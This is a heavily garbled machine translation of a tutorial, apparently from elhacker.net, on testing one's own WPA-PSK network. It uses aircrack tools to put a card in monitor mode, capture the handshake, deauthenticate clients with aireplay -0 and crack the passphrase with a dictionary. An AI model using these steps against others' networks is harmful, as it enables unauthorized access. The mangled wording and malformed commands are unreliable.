- After analyzing the insecure wireless networks are WEP encryption and ease with which WEP key can be recovered through traffic reinjection techniques, deauthentication, false authentication and data capture, we face the challenge of security check WPA networks. I will not explain the whole roll of this type of security, plus I do not know, but the pattern to continue to prove they are still uncertain (although not as much as configured), but depending on its configuration can be quite quiet really . There are several forms of security via WPA (at least I think so), but we mainly the most common used by most of our domestic networks of WPA-PSK if you enter RADIUS servers. Configuration using WEP encryption does not depend on a good set, they are just insecure. The WPA-PSK can be very safe, but if well configured.
just mention that this type of protection differs from the WEP key that is dynamic, ie changing from time to time and is specified for each terminal (if I'm wrong is the same as what we do is an application example practice, how would a potential attacker unauthorized).
But before we get to the show to explain some very basic theoretical concepts.
The routers and wireless cards should have a password for initial authentication, so you understand, as in Microsoft Windows 2000 Server where you must enter a user name and password to access resources, as this will tell in which roughly equal. Or for example any forum where we request a user name and password.
So let's go hunting for this secret key and thus simulate a virtual attack, so based on the results we can prevent and configure our system to achieve a high level of wireless security.
sniff do not need a lot of traffic, is not quantity but quality. And only you can take when a client authenticates with the access point. Therefore, although the amount of traffic is not important security level is much higher because the attackers must have patience to find the right traffic. This traffic right where presentations are made between client stations and access point is referred to as " handshake."
can be both windows and linux. With the premise that the number of cards that allow the attack 0 (deauthentication clients) is much higher in linux. When attacks are carried out 0, these customers will call back to authenticate legitimate especially if windows who controls the wireless and no applications found in wireless cards. In the latter case, this automatic re-association is more difficult to detect and analyze. But stating that with patience and without making any kind of attack can be achieved simply by observing and capturing the traffic and that this occurs at the time of the connection between client and access point.
seems simple truth (and no need for thousands of captured data), as there really is not so simple and we can say that the security level is higher.
should this statement to the following question: Once the correct traffic (with only a handshake is worth us) should be compared with words a dictionary (or by brute force method). These dictionaries are merely sequential files where each line is different written characters. And now the crucial point to determine if a wireless network may or may not be secure, and only depend on ourselves, as opposed to WEP which depend on us ever since by definition are completely unsafe.
cashier even imagine that you are going to take money and do not know the password as well we have 1, 10000 possibilities. There is little cash and if you leave us no more than 3 attempts to block the bill would be easily tested for several days.
With WPA-PSK and the Aircrack suite have not limited attempts as we do outside the shortcut (we like you had at home a small box with 4-digit security and test all possible combinations.
But, the secret key of this type of security does not have to it be 4 decimal numbers (such as cash keys) but can vary between 8 and 63 ASCII characters if you run the wireless wizard of Windows XP Professional SP2. Each ASCII character in turn may have different possibilities because a simple calculation tells us that the potential total number of combinations for the high number of ASCII characters between 8 and 63 runs the length of the key. It is true that Not all ASCII characters can be used as within the keys, but the final number is still very high.
For example, counting only with numbers and letters, in total about 37 or so. If the key is 8 characters, the possible combinations would be 3.51247 + E12 and if of 6.3e +98, and that no distinction enters case. As there is no dictionary in the world to bring all these combinations. But if we use proper names such as "Feliciano", "Isabelle" or animals such as "rhino" or generic as "Internet" if often in these dictionaries. But for example "ql9sj3rs7f" if it would be a good key, just that we tend not to use this type wrong, something similar to the keys of our emails and recorded hits on pages where we always use them, and without above are fairly difficult to remember, besides the aim and paste it into the monitor screen.
seems that we can start to breathe easy for anyone not authorized to access our wireless network and absorb our bandwidth internet connection.
So never elaboréis a key using the personal computer that man has to remember things, I personally use keys that almost always forget and then I have to reset the access point to change it.
That said, one should add that this demonstration is designed so that we can prove it with our own equipment and check the security level of your wireless installations. I always say that you have to put in place for people who have skills to access our wireless network, you have to be more prepared than them, and a simulation of real attack with our own equipment allows us to achieve results worthy of examination.
- As I said before the testing on our own equipment, then we will need the following:
1 .- A wireless router that incorporates WPA-PSK security, which come in the Zyxel ADSL phone kit may be worth. If you do not have a router is worth the same to an access point, but I'll explain to this router. Nor is it necessary only a router, but more specifically an access point , but these routers already incorporated. 2 .- A
pc (whatever it is) but with 2 wireless cards, one for normal work and one for data capture, so the card with the normal connection should allow WPA-PSK and Capture card should allow monitor and attack mode 0 for linux and / or windows. If only monitor mode is enabled it also but we will be more limited. I'll explain in linux with the attack 0. If you want to see how an attack is made 0 (deauthentication) in windows you just have to access the Manual jet traffic in windows.
3 .- Operating System: I'm going to explain to Linux, but it is for windows except that the attack 0 has a different light because it is only possible with a card with atheros chipset and compatible with CommView 5.2 for wifi ) and therefore if you do not have a card with this support is to wait for the client to authenticate the first time. Always remember that not all cards in both Linux and Windows allow the attack 0.
Note: I will not explain how the card is configured for WPA-PSK for Windows as it is very difficult, but after reading how a small thing that you'll know I do, plus if you explain how you configure the router, a Once seen as the router will understand how to do it with your card for Windows.
If Linux explain how to configure your card to work with WPA-PSK, but I will for the Conceptronic C54Ri. The driver for Linux has a specific method fast enough for the others require the wpa_supplicant suite
To configure the capture card I think we all know how to do it in Windows and Linux.
3 .- Set the access point / router and wireless card (WPA-PSK)
went into the configuration of our router via http or by applying the proper configuration. The good news is that http can be made in both Linux and Windows and is the best way for me (you do it as best you know or want).
We must find a section in the router like this:
must be in the Wireless LAN section and paragraph of 802.1x/WPA.
Port Control In Wireless Requerided select Authentification.
Of the timer up with them, but if they are to zero to some value, which are reflected here may be worth.
In Key Management Protocol has l select WPA-PS K.
Group Data Privacy In select TKIP .
And Pre-Shared Key put the password that is what we find, in my case I put " josemaria " (without the quotes) that may very well be my name.
Now in Wireless LAN we go to paragraph WirelessEnabled "Enable Wireless LAN . " We
network name (essid ), in this case " Police."
This capturesessid is set to remain hidden. But it will qualify for these tests. In the event that was hidden would be the same as we already know how to get and it does not matter for this type of attack.
I put the channel 1, although as that is. And RTS and fragmentation nor comment, nor total not used.
Well you click on the buttons " aply " and we have set the router to work wirelessly with WPA-PSK security.
4 .- CCW program and card settings for WPA-PSK
How to work with Linux and more precisely the use of commands is very stressful and tedious design this small application.
This application is a simple graphical interface for processing commands.
appoints anyway I will write the commands executed.
I teach it:
It is quite useful. Today we are on version 7. And the charge current project I start is Uxio
Now explain how to do it in Linux for a Conceptronic C54Ri the Ralink RT2500 chipset, but ............
have to have installed the latest drivers. Visit Linux driver area. (classic old but functional area)
I suppose it's valid for any card with the Ralink RT2500 chipset, like the Conceptronic C54RC.
I put a driver that also goes for the reinjection of traffic for WEP security, and does not require any patches.
Note: access to new linux driver area, by clicking: here
I prepare a script to configure the card (the name of the script that you put you want)
There will capture Display:
As is, I think it is necessary say anything. Just to say that for other alternative ways open cards and / or different from doing. For example, the suite of wpa_supplicant (or any specific form.) This where we run this, in this case: . / Wpa.sh
cuyalquierIf you are using version of CCW and have created (the script) in the same directory as the application or have it copied to, press the button "Open shell" and run: . / wpa.sh
I put a picture after it executed the script (basically the program ccw1)
see the card and the system recognize the router, so we know we have a wireless network set up with WPA-PSK security.
even not necessary to prove access to the Internet, with what we have now is enough to keep working.
5 .- Capture general and particular
Well let's what really matters. At this point, we all know how the monitor mode, if not You know I advise you to stop reading this manual and you address the Guide drivers for monitor mode in windows .
The study of insecurity will do with my D-Link Super G chipset G520 Rev. B3 atheros (ath0 Interface ). Active
the card using the appropriate command and execute "start ath0 airmon.sh " o:
iwconfig ath0 mode monitor, or use the button CCW1 specific.
see that all is well. For Windows you know, you execute the program airodump and card-specific drivers with monitor mode.
There is a sample:
now turn to the overall harvest of all the channels, in Windows as well, with airodump.
Command: airodump ath0 0 file, or click the CCW1 specific.
And we get:
Other signs we see, in this case do not matter and personal ethics and the occult, it is important that we see the wireless signal created by us with the router and C54Ri card. We see the MAC of the router, the client's MAC, essid and channel.
Now take note of all the data and introduce them into the application in the CCW1, or simply aiming.
Both Windows and Linux to close the catch.
For Windows open again and we put airodump to capture only the channel 1 . A response y / n of airodump in Windows, we respond not only in this way to have a file of type: *. cap. words *. ivs files only including IVs invalid for this type of security. The IVs are only valid for key recovery for wireless networks with WEP encryption.
execute "start ath0 airmon.sh 1 "
or click on the appropriate button CCW1.
If we know this to pass from the airmon.sh:
is: iwconfig ath0 mode monitor channel 1
now open again with the following command airodump or using the program CCW1.
airodump ath0 1
policiawpaAnd we see, as this:
have already prepared for data capture. We again
the router and the client, ie the C54Ri.
We do not know if the traffic is right and also in data there is only one "1 ."
Nothing happens, we attack the 0 either linux or the winyector
6 .- deauthentication of legitimate clients.
0conducted the attack using the command or button of CCW1 specific:
ath0 aireplay -0 5-a-c MAC_CLIENTE MAC_AP
But be careful, to be effective to try different speeds.
Quote: iwconfig ath0 rate 54M iwconfig ath0 rate 24M up
As I use this program and prepare everything from saving me a lot of code writing, because the program does it for me.
Here's a sample:
is quite clear, first started the process of arrest and while he is in it, we made the attack 0. There are models of cards and drivers that can do it with the same card, ie in this case the atheros (capture and injection).
And we get after the attack 0:
We
that traffic has increased. In the event that had always capture traffic stop a few minutes to produce correctly the key exchange between client and access point. At the same time also produced the sharing of the network name (essid) and although it was hidden could be determined easily.
To make such attacks on Windows I recommend the injection Traffic Manual on Windows or
aireplay injection Manual for Windows (berni69)
7 .- Recovery of the secret key
I open a shell (of whatever form) and launch :
aircrack-a 2-w / ruta_diccionario / dictionary policiawpa.cap
The file is in *. cap that passed no argument 1 to airodump, and this is how we want it. The CCW1
deselect the checkbox "Save data only" as this is selected by default, but you will obtain files of type *. ivs. This format has always been for all versions of ccw.
Route ( ruta_diccionario ) is any folder and must be put in full. The dictionary is merely a basic text file sequentially (without additives could be like Word files). In every line of this file we find different characters ( ultimately verification key).
That comes out to run the command:
Both
manual high security with encryption WPA-PSK and we have only obtained a handshake , well that's enough quiet, now click 3 ( see what each has in his capture ) corresponding to the study of WPA Key Recovery -PSK wireless network on our own and ............... wait partners, is that there is much more to do. Many times you will scratch, so to repeat the process with other dictionary.
There are many areas on the Internet where you can get free dictionaries discussed here, but in no time which informs the download, the page may be very temporary. Saying that there are several Linux LiveCD that already incorporate dictionaries.
If the dictionary is good and the key is not very difficult it can take a long or infinite, when you finish reading all the keys and it does not correspond to real, in that application will go forth the word EOF (end of file), then well do not despair and I play to use another dictionary. And if ever you give her, because Congratulations, you have configured your wireless network secure, but 100% never will, this will never forget ...............
If you have configured your wireless network with a low security level (always speak of WPA-PSK) you will:
And I repeat to make it look just the aircrack 2.3 without adding ccw project implementation.
Tip: If after several days is not the place you find and be happy guys put the nerves and may doubt whether or not these wireless auditing tools work well, listen to me, open the dictionary with a text editor normal text (you want) and add any line in the same row with the secret name. You will see how, if found, proving that the study is valid for both negative and positive results for the recovery of WPA-PSK key.
last I know this seems very serious to see a level of security, but to know that what is important in this type of configuration is to catch the right traffic, and determine the use of nails were normal logic not covered in any dictionary only thus achieving a high yield of the security settings in wireless or wireless.
For a real attacker on our wireless network, you can not add any keys to the dictionary because they obviously do not know. So we sure what is more important, know how to configure our wireless equipment to give greater security to the system (if we are not able to retrieve a WPA-PSK key, have no doubt that it really is safe, because best defense is a good offense and you always have to analyze your system from the standpoint of the attacker and correct in that sense, we must be as prepared as possible.)
remembered that catches were made at the time the application ccw1, but you already have the new ccw7 (kept the ccw1 same functions as explained here, but increased considerably).
Everything explained here is valid for the new aircrack-ng suite, you can check your command specifications in:
- Group Program
CCW is a simple graphic interface where you collect as most of actions relating to the audit in wireless linux. Hence the name of wireless integrated control center.
Installation is very simple, all you need is to download and install the program before prawns to use their libraries. The shrimp only need to install and do nothing with it.
For version 7 is required gambas2 really very easy to install on Debian.
If you have Debian or Fedora Core install the best shrimp 1 and 2 is through the repositories.
gambas2 To download the binary formats sourceforge do better.
also mention that we talked about version 2.3 of the suite of program ceo C. Devine but there are updated versions but the same design, such as 2.41 and the new generation ng.
I think we can be comfortable with this kind of protection that no one took away bandwidth, but only ....... if you use a password really hard to find in a dictionary. New
windows tools to enhance WPA security analysis
Article Source: http://hwagm .elhacker.net / wpa / wpa.htm # p5